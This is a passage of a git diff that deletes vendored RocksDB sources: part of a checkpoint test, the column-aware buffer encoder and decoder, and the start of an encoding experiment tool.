-      ASSERT_OK(txn->Prepare());
-    }
-    delete tx;
-  }
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"CheckpointImpl::CreateCheckpoint:SavedLiveFiles1",
-        "CheckpointTest::CurrentFileModifiedWhileCheckpointing2PC:PreCommit"},
-       {"CheckpointTest::CurrentFileModifiedWhileCheckpointing2PC:PostCommit",
-        "CheckpointImpl::CreateCheckpoint:SavedLiveFiles2"}});
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  rocksdb::port::Thread t([&]() {
-    Checkpoint* checkpoint;
-    ASSERT_OK(Checkpoint::Create(txdb, &checkpoint));
-    ASSERT_OK(checkpoint->CreateCheckpoint(kSnapshotName));
-    delete checkpoint;
-  });
-  TEST_SYNC_POINT(
-      "CheckpointTest::CurrentFileModifiedWhileCheckpointing2PC:PreCommit");
-  ASSERT_OK(txn->Commit());
-  delete txn;
-  TEST_SYNC_POINT(
-      "CheckpointTest::CurrentFileModifiedWhileCheckpointing2PC:PostCommit");
-  t.join();
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-
-  // No more than two logs files should exist.
-  std::vector<std::string> files;
-  env_->GetChildren(kSnapshotName, &files);
-  int num_log_files = 0;
-  for (auto& file : files) {
-    uint64_t num;
-    FileType type;
-    WalFileType log_type;
-    if (ParseFileName(file, &num, &type, &log_type) && type == kLogFile) {
-      num_log_files++;
-    }
-  }
-  // One flush after preapare + one outstanding file before checkpoint + one log
-  // file generated after checkpoint.
-  ASSERT_LE(num_log_files, 3);
-
-  TransactionDB* snapshotDB;
-  std::vector<ColumnFamilyDescriptor> column_families;
-  column_families.push_back(
-      ColumnFamilyDescriptor(kDefaultColumnFamilyName, ColumnFamilyOptions()));
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFA", ColumnFamilyOptions()));
-  column_families.push_back(
-      ColumnFamilyDescriptor("CFB", ColumnFamilyOptions()));
-  std::vector<rocksdb::ColumnFamilyHandle*> cf_handles;
-  ASSERT_OK(TransactionDB::Open(options, txn_db_options, kSnapshotName,
-                                column_families, &cf_handles, &snapshotDB));
-  ASSERT_OK(snapshotDB->Get(read_options, "foo", &value));
-  ASSERT_EQ(value, "bar");
-  ASSERT_OK(snapshotDB->Get(read_options, cf_handles[1], "foocfa", &value));
-  ASSERT_EQ(value, "barcfa");
-
-  delete cfa;
-  delete cfb;
-  delete cf_handles[0];
-  delete cf_handles[1];
-  delete cf_handles[2];
-  delete snapshotDB;
-  snapshotDB = nullptr;
-  delete txdb;
-}
-
-}  // namespace rocksdb
-
-int main(int argc, char** argv) {
-  rocksdb::port::InstallStackTraceHandler();
-  ::testing::InitGoogleTest(&argc, argv);
-  return RUN_ALL_TESTS();
-}
-
-#else
-#include <stdio.h>
-
-int main(int argc, char** argv) {
-  fprintf(stderr, "SKIPPED as Checkpoint is not supported in ROCKSDB_LITE\n");
-  return 0;
-}
-
-#endif  // !ROCKSDB_LITE
diff --git a/thirdparty/rocksdb/utilities/col_buf_decoder.cc b/thirdparty/rocksdb/utilities/col_buf_decoder.cc
deleted file mode 100644
index 3fb3179..0000000
--- a/thirdparty/rocksdb/utilities/col_buf_decoder.cc
+++ /dev/null
@@ -1,240 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "utilities/col_buf_decoder.h"
-#include <cstring>
-#include <string>
-#include "port/port.h"
-
-namespace rocksdb {
-
-ColBufDecoder::~ColBufDecoder() {}
-
-namespace {
-
-inline uint64_t EncodeFixed64WithEndian(uint64_t val, bool big_endian,
-                                        size_t size) {
-  if (big_endian && port::kLittleEndian) {
-    val = EndianTransform(val, size);
-  } else if (!big_endian && !port::kLittleEndian) {
-    val = EndianTransform(val, size);
-  }
-  return val;
-}
-
-}  // namespace
-
-ColBufDecoder* ColBufDecoder::NewColBufDecoder(
-    const ColDeclaration& col_declaration) {
-  if (col_declaration.col_type == "FixedLength") {
-    return new FixedLengthColBufDecoder(
-        col_declaration.size, col_declaration.col_compression_type,
-        col_declaration.nullable, col_declaration.big_endian);
-  } else if (col_declaration.col_type == "VariableLength") {
-    return new VariableLengthColBufDecoder();
-  } else if (col_declaration.col_type == "VariableChunk") {
-    return new VariableChunkColBufDecoder(col_declaration.col_compression_type);
-  } else if (col_declaration.col_type == "LongFixedLength") {
-    return new LongFixedLengthColBufDecoder(col_declaration.size,
-                                            col_declaration.nullable);
-  }
-  // Unrecognized column type
-  return nullptr;
-}
-
-namespace {
-
-void ReadVarint64(const char** src_ptr, uint64_t* val_ptr) {
-  const char* q = GetVarint64Ptr(*src_ptr, *src_ptr + 10, val_ptr);
-  assert(q != nullptr);
-  *src_ptr = q;
-}
-}  // namespace
-
-size_t FixedLengthColBufDecoder::Init(const char* src) {
-  remain_runs_ = 0;
-  last_val_ = 0;
-  // Dictionary initialization
-  dict_vec_.clear();
-  const char* orig_src = src;
-  if (col_compression_type_ == kColDict ||
-      col_compression_type_ == kColRleDict) {
-    const char* q;
-    uint64_t dict_size;
-    // Bypass limit
-    q = GetVarint64Ptr(src, src + 10, &dict_size);
-    assert(q != nullptr);
-    src = q;
-
-    uint64_t dict_key;
-    for (uint64_t i = 0; i < dict_size; ++i) {
-      // Bypass limit
-      ReadVarint64(&src, &dict_key);
-
-      dict_key = EncodeFixed64WithEndian(dict_key, big_endian_, size_);
-      dict_vec_.push_back(dict_key);
-    }
-  }
-  return src - orig_src;
-}
-
-size_t FixedLengthColBufDecoder::Decode(const char* src, char** dest) {
-  uint64_t read_val = 0;
-  const char* orig_src = src;
-  const char* src_limit = src + 20;
-  if (nullable_) {
-    bool not_null;
-    not_null = *src;
-    src += 1;
-    if (!not_null) {
-      return 1;
-    }
-  }
-  if (IsRunLength(col_compression_type_)) {
-    if (remain_runs_ == 0) {
-      const char* q;
-      run_val_ = 0;
-      if (col_compression_type_ == kColRle) {
-        memcpy(&run_val_, src, size_);
-        src += size_;
-      } else {
-        q = GetVarint64Ptr(src, src_limit, &run_val_);
-        assert(q != nullptr);
-        src = q;
-      }
-
-      q = GetVarint64Ptr(src, src_limit, &remain_runs_);
-      assert(q != nullptr);
-      src = q;
-
-      if (col_compression_type_ != kColRleDeltaVarint &&
-          col_compression_type_ != kColRleDict) {
-        run_val_ = EncodeFixed64WithEndian(run_val_, big_endian_, size_);
-      }
-    }
-    read_val = run_val_;
-  } else {
-    if (col_compression_type_ == kColNoCompression) {
-      memcpy(&read_val, src, size_);
-      src += size_;
-    } else {
-      // Assume a column does not exceed 8 bytes here
-      const char* q = GetVarint64Ptr(src, src_limit, &read_val);
-      assert(q != nullptr);
-      src = q;
-    }
-    if (col_compression_type_ != kColDeltaVarint &&
-        col_compression_type_ != kColDict) {
-      read_val = EncodeFixed64WithEndian(read_val, big_endian_, size_);
-    }
-  }
-
-  uint64_t write_val = read_val;
-  if (col_compression_type_ == kColDeltaVarint ||
-      col_compression_type_ == kColRleDeltaVarint) {
-    // does not support 64 bit
-
-    uint64_t mask = (write_val & 1) ? (~uint64_t(0)) : 0;
-    int64_t delta = (write_val >> 1) ^ mask;
-    write_val = last_val_ + delta;
-
-    uint64_t tmp = write_val;
-    write_val = EncodeFixed64WithEndian(write_val, big_endian_, size_);
-    last_val_ = tmp;
-  } else if (col_compression_type_ == kColRleDict ||
-             col_compression_type_ == kColDict) {
-    uint64_t dict_val = read_val;
-    assert(dict_val < dict_vec_.size());
-    write_val = dict_vec_[dict_val];
-  }
-
-  // dest->append(reinterpret_cast<char*>(&write_val), size_);
-  memcpy(*dest, reinterpret_cast<char*>(&write_val), size_);
-  *dest += size_;
-  if (IsRunLength(col_compression_type_)) {
-    --remain_runs_;
-  }
-  return src - orig_src;
-}
-
-size_t LongFixedLengthColBufDecoder::Decode(const char* src, char** dest) {
-  if (nullable_) {
-    bool not_null;
-    not_null = *src;
-    src += 1;
-    if (!not_null) {
-      return 1;
-    }
-  }
-  memcpy(*dest, src, size_);
-  *dest += size_;
-  return size_ + 1;
-}
-
-size_t VariableLengthColBufDecoder::Decode(const char* src, char** dest) {
-  uint8_t len;
-  len = *src;
-  memcpy(dest, reinterpret_cast<char*>(&len), 1);
-  *dest += 1;
-  src += 1;
-  memcpy(*dest, src, len);
-  *dest += len;
-  return len + 1;
-}
-
-size_t VariableChunkColBufDecoder::Init(const char* src) {
-  // Dictionary initialization
-  dict_vec_.clear();
-  const char* orig_src = src;
-  if (col_compression_type_ == kColDict) {
-    const char* q;
-    uint64_t dict_size;
-    // Bypass limit
-    q = GetVarint64Ptr(src, src + 10, &dict_size);
-    assert(q != nullptr);
-    src = q;
-
-    uint64_t dict_key;
-    for (uint64_t i = 0; i < dict_size; ++i) {
-      // Bypass limit
-      ReadVarint64(&src, &dict_key);
-      dict_vec_.push_back(dict_key);
-    }
-  }
-  return src - orig_src;
-}
-
-size_t VariableChunkColBufDecoder::Decode(const char* src, char** dest) {
-  const char* orig_src = src;
-  uint64_t size = 0;
-  ReadVarint64(&src, &size);
-  int64_t full_chunks = size / 8;
-  uint64_t chunk_buf;
-  size_t chunk_size = 8;
-  for (int64_t i = 0; i < full_chunks + 1; ++i) {
-    chunk_buf = 0;
-    if (i == full_chunks) {
-      chunk_size = size % 8;
-    }
-    if (col_compression_type_ == kColDict) {
-      uint64_t dict_val;
-      ReadVarint64(&src, &dict_val);
-      assert(dict_val < dict_vec_.size());
-      chunk_buf = dict_vec_[dict_val];
-    } else {
-      memcpy(&chunk_buf, src, chunk_size);
-      src += chunk_size;
-    }
-    memcpy(*dest, reinterpret_cast<char*>(&chunk_buf), 8);
-    *dest += 8;
-    uint8_t mask = ((0xFF - 8) + chunk_size) & 0xFF;
-    memcpy(*dest, reinterpret_cast<char*>(&mask), 1);
-    *dest += 1;
-  }
-
-  return src - orig_src;
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/col_buf_decoder.h b/thirdparty/rocksdb/utilities/col_buf_decoder.h
deleted file mode 100644
index e795e4e..0000000
--- a/thirdparty/rocksdb/utilities/col_buf_decoder.h
+++ /dev/null
@@ -1,116 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <cstdio>
-#include <cstring>
-#include <memory>
-#include <string>
-#include <unordered_map>
-#include <vector>
-#include "util/coding.h"
-#include "utilities/col_buf_encoder.h"
-
-namespace rocksdb {
-
-struct ColDeclaration;
-
-// ColBufDecoder is a class to decode column buffers. It can be populated from a
-// ColDeclaration. Before starting decoding, a Init() method should be called.
-// Each time it takes a column value into Decode() method.
-class ColBufDecoder {
- public:
-  virtual ~ColBufDecoder() = 0;
-  virtual size_t Init(const char* src) { return 0; }
-  virtual size_t Decode(const char* src, char** dest) = 0;
-  static ColBufDecoder* NewColBufDecoder(const ColDeclaration& col_declaration);
-
- protected:
-  std::string buffer_;
-  static inline bool IsRunLength(ColCompressionType type) {
-    return type == kColRle || type == kColRleVarint ||
-           type == kColRleDeltaVarint || type == kColRleDict;
-  }
-};
-
-class FixedLengthColBufDecoder : public ColBufDecoder {
- public:
-  explicit FixedLengthColBufDecoder(
-      size_t size, ColCompressionType col_compression_type = kColNoCompression,
-      bool nullable = false, bool big_endian = false)
-      : size_(size),
-        col_compression_type_(col_compression_type),
-        nullable_(nullable),
-        big_endian_(big_endian) {}
-
-  size_t Init(const char* src) override;
-  size_t Decode(const char* src, char** dest) override;
-  ~FixedLengthColBufDecoder() {}
-
- private:
-  size_t size_;
-  ColCompressionType col_compression_type_;
-  bool nullable_;
-  bool big_endian_;
-
-  // for decoding
-  std::vector<uint64_t> dict_vec_;
-  uint64_t remain_runs_;
-  uint64_t run_val_;
-  uint64_t last_val_;
-};
-
-class LongFixedLengthColBufDecoder : public ColBufDecoder {
- public:
-  LongFixedLengthColBufDecoder(size_t size, bool nullable)
-      : size_(size), nullable_(nullable) {}
-
-  size_t Decode(const char* src, char** dest) override;
-  ~LongFixedLengthColBufDecoder() {}
-
- private:
-  size_t size_;
-  bool nullable_;
-};
-
-class VariableLengthColBufDecoder : public ColBufDecoder {
- public:
-  size_t Decode(const char* src, char** dest) override;
-  ~VariableLengthColBufDecoder() {}
-};
-
-class VariableChunkColBufDecoder : public VariableLengthColBufDecoder {
- public:
-  size_t Init(const char* src) override;
-  size_t Decode(const char* src, char** dest) override;
-  explicit VariableChunkColBufDecoder(ColCompressionType col_compression_type)
-      : col_compression_type_(col_compression_type) {}
-  VariableChunkColBufDecoder() : col_compression_type_(kColNoCompression) {}
-
- private:
-  ColCompressionType col_compression_type_;
-  std::unordered_map<uint64_t, uint64_t> dictionary_;
-  std::vector<uint64_t> dict_vec_;
-};
-
-struct KVPairColBufDecoders {
-  std::vector<std::unique_ptr<ColBufDecoder>> key_col_bufs;
-  std::vector<std::unique_ptr<ColBufDecoder>> value_col_bufs;
-  std::unique_ptr<ColBufDecoder> value_checksum_buf;
-
-  explicit KVPairColBufDecoders(const KVPairColDeclarations& kvp_cd) {
-    for (auto kcd : *kvp_cd.key_col_declarations) {
-      key_col_bufs.emplace_back(
-          std::move(ColBufDecoder::NewColBufDecoder(kcd)));
-    }
-    for (auto vcd : *kvp_cd.value_col_declarations) {
-      value_col_bufs.emplace_back(
-          std::move(ColBufDecoder::NewColBufDecoder(vcd)));
-    }
-    value_checksum_buf.reset(
-        ColBufDecoder::NewColBufDecoder(*kvp_cd.value_checksum_declaration));
-  }
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/col_buf_encoder.cc b/thirdparty/rocksdb/utilities/col_buf_encoder.cc
deleted file mode 100644
index feaf564..0000000
--- a/thirdparty/rocksdb/utilities/col_buf_encoder.cc
+++ /dev/null
@@ -1,217 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#include "utilities/col_buf_encoder.h"
-#include <cstring>
-#include <string>
-#include "port/port.h"
-
-namespace rocksdb {
-
-ColBufEncoder::~ColBufEncoder() {}
-
-namespace {
-
-inline uint64_t DecodeFixed64WithEndian(uint64_t val, bool big_endian,
-                                        size_t size) {
-  if (big_endian && port::kLittleEndian) {
-    val = EndianTransform(val, size);
-  } else if (!big_endian && !port::kLittleEndian) {
-    val = EndianTransform(val, size);
-  }
-  return val;
-}
-
-}  // namespace
-
-const std::string &ColBufEncoder::GetData() { return buffer_; }
-
-ColBufEncoder *ColBufEncoder::NewColBufEncoder(
-    const ColDeclaration &col_declaration) {
-  if (col_declaration.col_type == "FixedLength") {
-    return new FixedLengthColBufEncoder(
-        col_declaration.size, col_declaration.col_compression_type,
-        col_declaration.nullable, col_declaration.big_endian);
-  } else if (col_declaration.col_type == "VariableLength") {
-    return new VariableLengthColBufEncoder();
-  } else if (col_declaration.col_type == "VariableChunk") {
-    return new VariableChunkColBufEncoder(col_declaration.col_compression_type);
-  } else if (col_declaration.col_type == "LongFixedLength") {
-    return new LongFixedLengthColBufEncoder(col_declaration.size,
-                                            col_declaration.nullable);
-  }
-  // Unrecognized column type
-  return nullptr;
-}
-
-#ifdef ROCKSDB_UBSAN_RUN
-#if defined(__clang__)
-__attribute__((__no_sanitize__("shift")))
-#elif defined(__GNUC__)
-__attribute__((__no_sanitize_undefined__))
-#endif
-#endif
-size_t FixedLengthColBufEncoder::Append(const char *buf) {
-  if (nullable_) {
-    if (buf == nullptr) {
-      buffer_.append(1, 0);
-      return 0;
-    } else {
-      buffer_.append(1, 1);
-    }
-  }
-  uint64_t read_val = 0;
-  memcpy(&read_val, buf, size_);
-  read_val = DecodeFixed64WithEndian(read_val, big_endian_, size_);
-
-  // Determine write value
-  uint64_t write_val = read_val;
-  if (col_compression_type_ == kColDeltaVarint ||
-      col_compression_type_ == kColRleDeltaVarint) {
-    int64_t delta = read_val - last_val_;
-    // Encode signed delta value
-    delta = (delta << 1) ^ (delta >> 63);
-    write_val = delta;
-    last_val_ = read_val;
-  } else if (col_compression_type_ == kColDict ||
-             col_compression_type_ == kColRleDict) {
-    auto iter = dictionary_.find(read_val);
-    uint64_t dict_val;
-    if (iter == dictionary_.end()) {
-      // Add new entry to dictionary
-      dict_val = dictionary_.size();
-      dictionary_.insert(std::make_pair(read_val, dict_val));
-      dict_vec_.push_back(read_val);
-    } else {
-      dict_val = iter->second;
-    }
-    write_val = dict_val;
-  }
-
-  // Write into buffer
-  if (IsRunLength(col_compression_type_)) {
-    if (run_length_ == -1) {
-      // First element
-      run_val_ = write_val;
-      run_length_ = 1;
-    } else if (write_val != run_val_) {
-      // End of run
-      // Write run value
-      if (col_compression_type_ == kColRle) {
-        buffer_.append(reinterpret_cast<char *>(&run_val_), size_);
-      } else {
-        PutVarint64(&buffer_, run_val_);
-      }
-      // Write run length
-      PutVarint64(&buffer_, run_length_);
-      run_val_ = write_val;
-      run_length_ = 1;
-    } else {
-      run_length_++;
-    }
-  } else {  // non run-length encodings
-    if (col_compression_type_ == kColNoCompression) {
-      buffer_.append(reinterpret_cast<char *>(&write_val), size_);
-    } else {
-      PutVarint64(&buffer_, write_val);
-    }
-  }
-  return size_;
-}
-
-void FixedLengthColBufEncoder::Finish() {
-  if (col_compression_type_ == kColDict ||
-      col_compression_type_ == kColRleDict) {
-    std::string header;
-    PutVarint64(&header, dict_vec_.size());
-    // Put dictionary in the header
-    for (auto item : dict_vec_) {
-      PutVarint64(&header, item);
-    }
-    buffer_ = header + buffer_;
-  }
-  if (IsRunLength(col_compression_type_)) {
-    // Finish last run value
-    if (col_compression_type_ == kColRle) {
-      buffer_.append(reinterpret_cast<char *>(&run_val_), size_);
-    } else {
-      PutVarint64(&buffer_, run_val_);
-    }
-    PutVarint64(&buffer_, run_length_);
-  }
-}
-
-size_t LongFixedLengthColBufEncoder::Append(const char *buf) {
-  if (nullable_) {
-    if (buf == nullptr) {
-      buffer_.append(1, 0);
-      return 0;
-    } else {
-      buffer_.append(1, 1);
-    }
-  }
-  buffer_.append(buf, size_);
-  return size_;
-}
-
-void LongFixedLengthColBufEncoder::Finish() {}
-
-size_t VariableLengthColBufEncoder::Append(const char *buf) {
-  uint8_t length = 0;
-  length = *buf;
-  buffer_.append(buf, 1);
-  buf += 1;
-  buffer_.append(buf, length);
-  return length + 1;
-}
-
-void VariableLengthColBufEncoder::Finish() {}
-
-size_t VariableChunkColBufEncoder::Append(const char *buf) {
-  const char *orig_buf = buf;
-  uint8_t mark = 0xFF;
-  size_t length = 0;
-  std::string tmp_buffer;
-  while (mark == 0xFF) {
-    uint64_t val;
-    memcpy(&val, buf, 8);
-    buf += 8;
-    mark = *buf;
-    buf += 1;
-    int8_t chunk_size = 8 - (0xFF - mark);
-    if (col_compression_type_ == kColDict) {
-      auto iter = dictionary_.find(val);
-      uint64_t dict_val;
-      if (iter == dictionary_.end()) {
-        dict_val = dictionary_.size();
-        dictionary_.insert(std::make_pair(val, dict_val));
-        dict_vec_.push_back(val);
-      } else {
-        dict_val = iter->second;
-      }
-      PutVarint64(&tmp_buffer, dict_val);
-    } else {
-      tmp_buffer.append(reinterpret_cast<char *>(&val), chunk_size);
-    }
-    length += chunk_size;
-  }
-
-  PutVarint64(&buffer_, length);
-  buffer_.append(tmp_buffer);
-  return buf - orig_buf;
-}
-
-void VariableChunkColBufEncoder::Finish() {
-  if (col_compression_type_ == kColDict) {
-    std::string header;
-    PutVarint64(&header, dict_vec_.size());
-    for (auto item : dict_vec_) {
-      PutVarint64(&header, item);
-    }
-    buffer_ = header + buffer_;
-  }
-}
-
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/col_buf_encoder.h b/thirdparty/rocksdb/utilities/col_buf_encoder.h
deleted file mode 100644
index 9028799..0000000
--- a/thirdparty/rocksdb/utilities/col_buf_encoder.h
+++ /dev/null
@@ -1,219 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-#pragma once
-#include <cstdio>
-#include <cstring>
-#include <memory>
-#include <string>
-#include <unordered_map>
-#include <vector>
-#include "util/coding.h"
-
-namespace rocksdb {
-
-enum ColCompressionType {
-  kColNoCompression,
-  kColRle,
-  kColVarint,
-  kColRleVarint,
-  kColDeltaVarint,
-  kColRleDeltaVarint,
-  kColDict,
-  kColRleDict
-};
-
-struct ColDeclaration;
-
-// ColBufEncoder is a class to encode column buffers. It can be populated from a
-// ColDeclaration. Each time it takes a column value into Append() method to
-// encode the column and store it into an internal buffer. After all rows for
-// this column are consumed, a Finish() should be called to add header and
-// remaining data.
-class ColBufEncoder {
- public:
-  // Read a column, encode data and append into internal buffer.
-  virtual size_t Append(const char *buf) = 0;
-  virtual ~ColBufEncoder() = 0;
-  // Get the internal column buffer. Should only be called after Finish().
-  const std::string &GetData();
-  // Finish encoding. Add header and remaining data.
-  virtual void Finish() = 0;
-  // Populate a ColBufEncoder from ColDeclaration.
-  static ColBufEncoder *NewColBufEncoder(const ColDeclaration &col_declaration);
-
- protected:
-  std::string buffer_;
-  static inline bool IsRunLength(ColCompressionType type) {
-    return type == kColRle || type == kColRleVarint ||
-           type == kColRleDeltaVarint || type == kColRleDict;
-  }
-};
-
-// Encoder for fixed length column buffer. In fixed length column buffer, the
-// size of the column should not exceed 8 bytes.
-// The following encodings are supported:
-// Varint: Variable length integer. See util/coding.h for more details
-// Rle (Run length encoding): encode a sequence of contiguous value as
-// [run_value][run_length]. Can be combined with Varint
-// Delta: Encode value to its delta with its adjacent entry. Use varint to
-// possibly reduce stored bytes. Can be combined with Rle.
-// Dictionary: Use a dictionary to record all possible values in the block and
-// encode them with an ID started from 0. IDs are encoded as varint. A column
-// with dictionary encoding will have a header to store all actual values,
-// ordered by their dictionary value, and the data will be replaced by
-// dictionary value. Can be combined with Rle.
-class FixedLengthColBufEncoder : public ColBufEncoder {
- public:
-  explicit FixedLengthColBufEncoder(
-      size_t size, ColCompressionType col_compression_type = kColNoCompression,
-      bool nullable = false, bool big_endian = false)
-      : size_(size),
-        col_compression_type_(col_compression_type),
-        nullable_(nullable),
-        big_endian_(big_endian),
-        last_val_(0),
-        run_length_(-1),
-        run_val_(0) {}
-
-  size_t Append(const char *buf) override;
-  void Finish() override;
-  ~FixedLengthColBufEncoder() {}
-
- private:
-  size_t size_;
-  ColCompressionType col_compression_type_;
-  // If set as true, the input value can be null (represented as nullptr). When
-  // nullable is true, use one more byte before actual value to indicate if the
-  // current value is null.
-  bool nullable_;
-  // If set as true, input value will be treated as big endian encoded.
-  bool big_endian_;
-
-  // for encoding
-  uint64_t last_val_;
-  int16_t run_length_;
-  uint64_t run_val_;
-  // Map to store dictionary for dictionary encoding
-  std::unordered_map<uint64_t, uint64_t> dictionary_;
-  // Vector of dictionary keys.
-  std::vector<uint64_t> dict_vec_;
-};
-
-// Long fixed length column buffer is a variant of fixed length buffer to hold
-// fixed length buffer with more than 8 bytes. We do not support any special
-// encoding schemes in LongFixedLengthColBufEncoder.
-class LongFixedLengthColBufEncoder : public ColBufEncoder {
- public:
-  LongFixedLengthColBufEncoder(size_t size, bool nullable)
-      : size_(size), nullable_(nullable) {}
-  size_t Append(const char *buf) override;
-  void Finish() override;
-
-  ~LongFixedLengthColBufEncoder() {}
-
- private:
-  size_t size_;
-  bool nullable_;
-};
-
-// Variable length column buffer holds a format of variable length column. In
-// this format, a column is composed of one byte length k, followed by data with
-// k bytes long data.
-class VariableLengthColBufEncoder : public ColBufEncoder {
- public:
-  size_t Append(const char *buf) override;
-  void Finish() override;
-
-  ~VariableLengthColBufEncoder() {}
-};
-
-// Variable chunk column buffer holds another format of variable length column.
-// In this format, a column contains multiple chunks of data, each of which is
-// composed of 8 bytes long data, and one byte as a mask to indicate whether we
-// have more data to come. If no more data coming, the mask is set as 0xFF. If
-// the chunk is the last chunk and has only k valid bytes, the mask is set as
-// 0xFF - (8 - k).
-class VariableChunkColBufEncoder : public VariableLengthColBufEncoder {
- public:
-  size_t Append(const char *buf) override;
-  void Finish() override;
-  explicit VariableChunkColBufEncoder(ColCompressionType col_compression_type)
-      : col_compression_type_(col_compression_type) {}
-  VariableChunkColBufEncoder() : col_compression_type_(kColNoCompression) {}
-
- private:
-  ColCompressionType col_compression_type_;
-  // Map to store dictionary for dictionary encoding
-  std::unordered_map<uint64_t, uint64_t> dictionary_;
-  // Vector of dictionary keys.
-  std::vector<uint64_t> dict_vec_;
-};
-
-// ColDeclaration declares a column's type, algorithm of column-aware encoding,
-// and other column data like endian and nullability.
-struct ColDeclaration {
-  explicit ColDeclaration(
-      std::string _col_type,
-      ColCompressionType _col_compression_type = kColNoCompression,
-      size_t _size = 0, bool _nullable = false, bool _big_endian = false)
-      : col_type(_col_type),
-        col_compression_type(_col_compression_type),
-        size(_size),
-        nullable(_nullable),
-        big_endian(_big_endian) {}
-  std::string col_type;
-  ColCompressionType col_compression_type;
-  size_t size;
-  bool nullable;
-  bool big_endian;
-};
-
-// KVPairColDeclarations is a class to hold column declaration of columns in
-// key and value.
-struct KVPairColDeclarations {
-  std::vector<ColDeclaration> *key_col_declarations;
-  std::vector<ColDeclaration> *value_col_declarations;
-  ColDeclaration *value_checksum_declaration;
-  KVPairColDeclarations(std::vector<ColDeclaration> *_key_col_declarations,
-                        std::vector<ColDeclaration> *_value_col_declarations,
-                        ColDeclaration *_value_checksum_declaration)
-      : key_col_declarations(_key_col_declarations),
-        value_col_declarations(_value_col_declarations),
-        value_checksum_declaration(_value_checksum_declaration) {}
-};
-
-// Similar to KVPairDeclarations, KVPairColBufEncoders is used to hold column
-// buffer encoders of all columns in key and value.
-struct KVPairColBufEncoders {
-  std::vector<std::unique_ptr<ColBufEncoder>> key_col_bufs;
-  std::vector<std::unique_ptr<ColBufEncoder>> value_col_bufs;
-  std::unique_ptr<ColBufEncoder> value_checksum_buf;
-
-  explicit KVPairColBufEncoders(const KVPairColDeclarations &kvp_cd) {
-    for (auto kcd : *kvp_cd.key_col_declarations) {
-      key_col_bufs.emplace_back(
-          std::move(ColBufEncoder::NewColBufEncoder(kcd)));
-    }
-    for (auto vcd : *kvp_cd.value_col_declarations) {
-      value_col_bufs.emplace_back(
-          std::move(ColBufEncoder::NewColBufEncoder(vcd)));
-    }
-    value_checksum_buf.reset(
-        ColBufEncoder::NewColBufEncoder(*kvp_cd.value_checksum_declaration));
-  }
-
-  // Helper function to call Finish()
-  void Finish() {
-    for (auto &col_buf : key_col_bufs) {
-      col_buf->Finish();
-    }
-    for (auto &col_buf : value_col_bufs) {
-      col_buf->Finish();
-    }
-    value_checksum_buf->Finish();
-  }
-};
-}  // namespace rocksdb
diff --git a/thirdparty/rocksdb/utilities/column_aware_encoding_exp.cc b/thirdparty/rocksdb/utilities/column_aware_encoding_exp.cc
deleted file mode 100644
index 9dcd23e..0000000
--- a/thirdparty/rocksdb/utilities/column_aware_encoding_exp.cc
+++ /dev/null
@@ -1,176 +0,0 @@
-//  Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-//
-#ifndef __STDC_FORMAT_MACROS
-#define __STDC_FORMAT_MACROS
-#endif
-
-#include <cstdio>
-#include <cstdlib>
-
-#ifndef ROCKSDB_LITE
-#ifdef GFLAGS
-
-#include <gflags/gflags.h>
-#include <inttypes.h>
-#include <vector>
-#include "rocksdb/env.h"
-#include "rocksdb/options.h"
-#include "table/block_based_table_builder.h"
-#include "table/block_based_table_reader.h"
-#include "table/format.h"
-#include "tools/sst_dump_tool_imp.h"
-#include "util/compression.h"
-#include "util/stop_watch.h"
-#include "utilities/col_buf_encoder.h"
-#include "utilities/column_aware_encoding_util.h"
-
-using GFLAGS::ParseCommandLineFlags;
-DEFINE_string(encoded_file, "", "file to store encoded data blocks");
-DEFINE_string(decoded_file, "",
-              "file to store decoded data blocks after encoding");
-DEFINE_string(format, "col", "Output Format. Can be 'row' or 'col'");
-// TODO(jhli): option `col` should be removed and replaced by general
-// column specifications.
-DEFINE_string(index_type, "col", "Index type. Can be 'primary' or 'secondary'");
-DEFINE_string(dump_file, "",
-              "Dump data blocks separated by columns in human-readable format");
-DEFINE_bool(decode, false, "Deocde blocks after they are encoded");
-DEFINE_bool(stat, false,
-            "Print column distribution statistics. Cannot decode in this mode");
-DEFINE_string(compression_type, "kNoCompression",
-              "The compression algorithm used to compress data blocks");
-
-namespace rocksdb {
-
-class ColumnAwareEncodingExp {
- public:
-  static void Run(const std::string& sst_file) {
-    bool decode = FLAGS_decode;
-    if (FLAGS_decoded_file.size() > 0) {
-      decode = true;
-    }
-    if (FLAGS_stat) {
-      decode = false;
-    }
-
-    ColumnAwareEncodingReader reader(sst_file);
-    std::vector<ColDeclaration>* key_col_declarations;
-    std::vector<ColDeclaration>* value_col_declarations;
-    ColDeclaration* value_checksum_declaration;
-    if (FLAGS_index_type == "primary") {
-      ColumnAwareEncodingReader::GetColDeclarationsPrimary(
-          &key_col_declarations, &value_col_declarations,
-          &value_checksum_declaration);
-    } else {
-      ColumnAwareEncodingReader::GetColDeclarationsSecondary(
-          &key_col_declarations, &value_col_declarations,
-          &value_checksum_declaration);
-    }
-    KVPairColDeclarations kvp_cd(key_col_declarations, value_col_declarations,
-                                 value_checksum_declaration);
-
-    if (!FLAGS_dump_file.empty()) {
